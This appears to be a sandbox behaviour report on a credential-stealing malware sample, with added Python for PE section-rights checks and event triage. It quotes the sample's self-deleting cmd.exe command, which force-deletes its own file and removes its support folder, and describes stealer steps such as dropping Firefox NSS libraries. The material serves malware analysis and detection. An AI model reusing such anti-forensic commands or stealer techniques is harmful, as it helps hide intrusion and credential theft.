Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: sxs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: dlnashext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: wpdshext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\3.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: 3.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: mozglue.pdbP source: kat2225.tmp, 00000009.00000002.3206547696.000000006F8FD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr
Source: Binary string: freebl3.pdb source: freebl3.dll.9.dr
Source: Binary string: freebl3.pdbp source: freebl3.dll.9.dr
Source: Binary string: nss3.pdb@ source: kat2225.tmp, 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.9.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.9.dr, vcruntime140.dll.9.dr
Source: Binary string: nss3.pdb source: kat2225.tmp, 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr
Source: Binary string: mozglue.pdb source: kat2225.tmp, 00000009.00000002.3206547696.000000006F8FD000.00000002.00000001.01000000.0000000D.sdmp, mozglue[1].dll.9.dr, mozglue.dll.9.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.9.dr

Data Obfuscation

Source: C:\Users\user\Desktop\3.exe Unpacked PE file: 0.2.3.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\A247.exe Unpacked PE file: 5.2.A247.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\A247.exe Unpacked PE file: 5.2.A247.exe.400000.0.unpack
Source: sqls[1].dll.9.dr Static PE information: section name: .00cfg
Source: freebl3.dll.9.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.9.dr Static PE information: section name: .00cfg
Source: mozglue.dll.9.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.9.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.9.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.9.dr Static PE information: section name: .didat
Source: nss3.dll.9.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.9.dr Static PE information: section name: .00cfg
Source: softokn3.dll.9.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.9.dr Static PE information: section name: .00cfg
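The three "Unpacked PE file" lines above compare section rights on disk with the rights in the memory image: 3.exe starts with .text:ER and ends with .text:EW, so its code section became writable, which is exactly what an in-place unpacker needs before it overwrites its own code. The section names listed after them (.00cfg, .didat) are produced by the MSVC linker for Control Flow Guard data and delay-import data; on their own they are not a packer indicator. The Python below is an added example by the editor, not code from the report or from Joe Sandbox. It parses a PE section table with the standard library only and prints the rights in the report's notation (W shown instead of RW, as inferred from the lines above). The two images it checks are constructed, header-only PE stubs laid out like the 3.exe line, not the sample itself, and the list of standard section names is the editor's assumption.

```python
import struct

# IMAGE_SECTION_HEADER.Characteristics bits from winnt.h
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Section names a normal MSVC link produces (editor's list); .00cfg (Control Flow Guard
# data) and .didat (delay-import data) belong here and are not packer artefacts.
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata", ".edata",
                     ".pdata", ".tls", ".bss", ".00cfg", ".didat", ".gfids", ".CRT"}


def parse_sections(pe: bytes):
    """Walk the section table of a PE image; returns [(name, characteristics)]."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # IMAGE_FILE_HEADER (20 bytes) follows the signature; we need the section count
    # and the optional header size to locate the section table.
    _, nsec, _, _, _, size_opt, _ = struct.unpack_from("<HHIIIHH", pe, e_lfanew + 4)
    table = e_lfanew + 4 + 20 + size_opt
    sections = []
    for i in range(nsec):
        raw_name, *_, chars = struct.unpack_from("<8sIIIIIIHHI", pe, table + 40 * i)
        sections.append((raw_name.rstrip(b"\0").decode("ascii", "replace"), chars))
    return sections


def rights(chars: int) -> str:
    """Render characteristics the way the report does: E, then W if writable, else R."""
    s = "E" if chars & IMAGE_SCN_MEM_EXECUTE else ""
    if chars & IMAGE_SCN_MEM_WRITE:
        s += "W"
    elif chars & IMAGE_SCN_MEM_READ:
        s += "R"
    return s


def section_rights(pe: bytes) -> str:
    """'.text:ER;.rdata:R;...' string comparable with the 'Unpacked PE file' lines."""
    return "".join(f"{name}:{rights(chars)};" for name, chars in parse_sections(pe))


def wx_sections(pe: bytes):
    """Sections that are both writable and executable: where self-modifying unpackers run."""
    return [name for name, chars in parse_sections(pe)
            if chars & IMAGE_SCN_MEM_WRITE and chars & IMAGE_SCN_MEM_EXECUTE]


def changed_rights(on_disk: bytes, in_memory: bytes):
    """Sections whose rights differ between the file and a memory dump of the same image."""
    disk = {n: rights(c) for n, c in parse_sections(on_disk)}
    mem = {n: rights(c) for n, c in parse_sections(in_memory)}
    return {n: (disk[n], mem[n]) for n in disk if n in mem and disk[n] != mem[n]}


def non_standard_sections(pe: bytes):
    return [name for name, _ in parse_sections(pe) if name not in STANDARD_SECTIONS]


def build_minimal_pe(sections):
    """Constructed test image: DOS header, PE signature, file/optional headers and a
    section table with no section data. Enough for the parser, not a loadable binary."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)        # e_lfanew
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x0102)
    opt_hdr = bytearray(0xE0)
    struct.pack_into("<H", opt_hdr, 0, 0x10B)      # PE32 magic
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                    0x1000, 0x1000 * (i + 1), 0x1000, 0, 0, 0, 0, 0, chars)
        for i, (name, chars) in enumerate(sections))
    return bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt_hdr) + table


# Constructed layouts mirroring the 3.exe line: rights on disk vs. after unpacking in memory.
ON_DISK = build_minimal_pe([
    (".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (".rdata", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    (".data", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (".rsrc", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
])
IN_MEMORY = build_minimal_pe([
    (".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
])

if __name__ == "__main__":
    print("disk:   ", section_rights(ON_DISK))
    print("memory: ", section_rights(IN_MEMORY))
    print("changed:", changed_rights(ON_DISK, IN_MEMORY), "W+X:", wx_sections(IN_MEMORY))
```

Run the same functions on the sample and on a process memory dump (the `.unpack` artefacts Joe Sandbox exports) to reproduce the comparison; a W+X code section in a dump that was R+X on disk is the unpacking signal, while an unfamiliar section name only warrants a look at what it contains.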
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_00402CD7 push cs; retf 0_2_00402CD8
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_00401EA7 push 0000000Eh; retf 0038h 0_2_00401EB6
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_004033B6 push eax; ret 0_2_00403419
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_02D5499B push cs; retf 0_2_02D5499C
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_02D53986 push ss; iretw 0_2_02D53998
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_02D53DB9 push cs; retf 0038h 0_2_02D53E38
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_02D59E65 push 0000002Ah; iretd 0_2_02D59EAF
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_02D60B01 push esi; ret 0_2_02D60C91
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_02D5500F push eax; ret 0_2_02D55010
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_02D53E29 push 0000000Eh; retf 0038h 0_2_02D53E38
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_02E42D3E push cs; retf 0_2_02E42D3F
Source: C:\Users\user\Desktop\3.exe Code function: 0_2_02E41F0E push 0000000Eh; retf 0038h 0_2_02E41F1D
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_00402CD7 push cs; retf 4_2_00402CD8
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_00401EA7 push 0000000Eh; retf 0038h 4_2_00401EB6
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_004033B6 push eax; ret 4_2_00403419
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_02E22D3E push cs; retf 4_2_02E22D3F
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_02E21F0E push 0000000Eh; retf 0038h 4_2_02E21F1D
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_02EB40EF push eax; ret 4_2_02EB40F0
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_02EB2E99 push cs; retf 0038h 4_2_02EB2F18
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_02EB2A66 push ss; iretw 4_2_02EB2A78
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_02EB3A7B push cs; retf 4_2_02EB3A7C
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_02EB8F45 push 0000002Ah; iretd 4_2_02EB8F8F
Source: C:\Users\user\AppData\Roaming\rcjjrra Code function: 4_2_02EB2F09 push 0000000Eh; retf 0038h 4_2_02EB2F18
Source: C:\Users\user\AppData\Local\Temp\A247.exe Code function: 5_2_0063030D push ecx; ret 5_2_00630315
Source: C:\Users\user\AppData\Local\Temp\5358.exe Code function: 8_2_043BB010 push edx; ret 8_2_043BB21F
Source: C:\Users\user\AppData\Local\Temp\5358.exe Code function: 8_2_043BA910 push edx; ret 8_2_043BA91B
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\ProgramData\DGHIECGCBKFH\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\ProgramData\DGHIECGCBKFH\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\ProgramData\DGHIECGCBKFH\softokn3.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\A247.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\ProgramData\DGHIECGCBKFH\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\ProgramData\DGHIECGCBKFH\mozglue.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\5358.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\rcjjrra Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\ProgramData\DGHIECGCBKFH\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\5358.exe File created: C:\Users\user\AppData\Local\Temp\kat2225.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqls[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\ProgramData\DGHIECGCBKFH\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\ProgramData\DGHIECGCBKFH\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\ProgramData\DGHIECGCBKFH\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\ProgramData\DGHIECGCBKFH\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\ProgramData\DGHIECGCBKFH\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\ProgramData\DGHIECGCBKFH\vcruntime140.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\rcjjrra Jump to dropped file
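The process tree above (explorer.exe starting A247.exe and 5358.exe from %TEMP%, kat2225.tmp starting cmd.exe with timeout, del and rd) and the dropped-file lines (nss3.dll, softokn3.dll, freebl3.dll and mozglue.dll written both to C:\ProgramData\DGHIECGCBKFH and to the IE cache) can be triaged mechanically, and the same checks carry over to other Joe Sandbox reports. The Python below is an added example by the editor, not part of the report or of Joe Sandbox. It embeds a subset of this report's own lines as constructed input, including the "File deleted" line from the section that follows. The user-writable path pattern and the rule that a directory must receive at least nss3, softokn3 and freebl3 before it counts as a stealer support directory are assumptions chosen for this example.

```python
import re
from collections import defaultdict

# Constructed input: a subset of this report's own behaviour lines, embedded verbatim.
REPORT_LINES = r"""
Source: unknown Process created: C:\Users\user\Desktop\3.exe "C:\Users\user\Desktop\3.exe"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\A247.exe C:\Users\user\AppData\Local\Temp\A247.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\5358.exe C:\Users\user\AppData\Local\Temp\5358.exe
Source: C:\Users\user\AppData\Local\Temp\5358.exe Process created: C:\Users\user\AppData\Local\Temp\kat2225.tmp C:\Users\user\AppData\Local\Temp\kat2225.tmp
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat2225.tmp" & rd /s /q "C:\ProgramData\DGHIECGCBKFH" & exit
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat2225.tmp" & rd /s /q "C:\ProgramData\DGHIECGCBKFH" & exit Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\ProgramData\DGHIECGCBKFH\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\ProgramData\DGHIECGCBKFH\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\ProgramData\DGHIECGCBKFH\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\ProgramData\DGHIECGCBKFH\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll Jump to dropped file
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\3.exe Jump to behavior
"""

LINE_RE = re.compile(r"^Source: (?P<src>\S+) (?P<verb>Process created|File created|File deleted): "
                     r"(?P<rest>.*?)(?: Jump to (?:behavior|dropped file))?$")
DEL_RE = re.compile(r'\bdel\s+(?:/\w\s+)*"([^"]+)"', re.I)   # del [/f /q] "<path>"
RD_RE = re.compile(r'\brd\s+(?:/\w\s+)*"([^"]+)"', re.I)     # rd [/s /q] "<dir>"
USER_WRITABLE = re.compile(r"^C:\\(?:Users\\[^\\]+\\AppData\\|ProgramData\\)", re.I)  # assumption
NSS_LIBS = {"nss3.dll", "softokn3.dll", "freebl3.dll", "mozglue.dll"}   # Mozilla NSS + glue
CACHE_SUFFIX = re.compile(r"\[\d+\](?=\.dll$)", re.I)                  # nss3[1].dll -> nss3.dll


def parse_events(text):
    """Turn 'Source: X <Verb>: Y [Jump to ...]' report lines into event dicts."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        src, verb, rest = m.group("src", "verb", "rest")
        if verb == "Process created":
            image, _, cmdline = rest.partition(" ")
            events.append({"verb": verb, "src": src, "image": image, "cmdline": cmdline})
        else:
            events.append({"verb": verb, "src": src, "path": rest})
    return events


def self_delete_chains(events):
    """Parent spawns cmd.exe that deletes the parent's own image after a timeout and
    removes directories alongside it (the kat2225.tmp -> cmd.exe line above)."""
    hits, seen = [], set()
    for ev in events:
        if ev["verb"] != "Process created" or not ev["image"].lower().endswith("\\cmd.exe"):
            continue
        cmd = ev["cmdline"]
        if ev["src"].lower() not in [t.lower() for t in DEL_RE.findall(cmd)]:
            continue
        if (ev["src"], cmd) not in seen:            # the report lists the same event twice
            seen.add((ev["src"], cmd))
            hits.append({"parent": ev["src"], "delayed": "timeout" in cmd.lower(),
                         "removed_dirs": RD_RE.findall(cmd)})
    return hits


def explorer_launches(events):
    """Executables explorer.exe started from user-writable paths: the shell does not
    normally launch payloads from %TEMP%, so this points at injected code in explorer."""
    out = []
    for ev in events:
        if (ev["verb"] == "Process created" and ev["src"].lower() == r"c:\windows\explorer.exe"
                and USER_WRITABLE.match(ev["image"]) and ev["image"] not in out):
            out.append(ev["image"])
    return out


def nss_drop_dirs(events):
    """Directories that received the NSS libraries needed to decrypt Firefox credentials."""
    by_dir = defaultdict(set)
    for ev in events:
        if ev["verb"] == "File created":
            directory, _, name = ev["path"].rpartition("\\")
            name = CACHE_SUFFIX.sub("", name).lower()
            if name in NSS_LIBS:
                by_dir[directory].add(name)
    return {d: sorted(libs) for d, libs in by_dir.items()
            if {"nss3.dll", "softokn3.dll", "freebl3.dll"} <= libs}


def deleted_launch_images(events):
    """Process images deleted by a different process (explorer.exe removing 3.exe)."""
    images = {ev["image"].lower() for ev in events if ev["verb"] == "Process created"}
    return [(ev["src"], ev["path"]) for ev in events if ev["verb"] == "File deleted"
            and ev["path"].lower() in images and ev["src"].lower() != ev["path"].lower()]


EVENTS = parse_events(REPORT_LINES)

if __name__ == "__main__":
    print(self_delete_chains(EVENTS), explorer_launches(EVENTS), sep="\n")
    print(nss_drop_dirs(EVENTS), deleted_launch_images(EVENTS), sep="\n")
```

Two things are worth checking by hand once the functions have run. The report lists each behaviour twice (once with a behaviour link), so the self-delete check deduplicates on the parent and command line. And the directory removed by the rd command is the same one that received the NSS libraries, so the cleanup command is the stealer removing its own support files rather than generic anti-forensics; a hunt for ProgramData directories holding nss3.dll and softokn3.dll next to no browser installation finds this stage on hosts where the cleanup never ran.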

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\3.exe Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\rcjjrra:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5358.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5358.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp Process information set: NOOPENFILEERRORBOX Jump to behavior
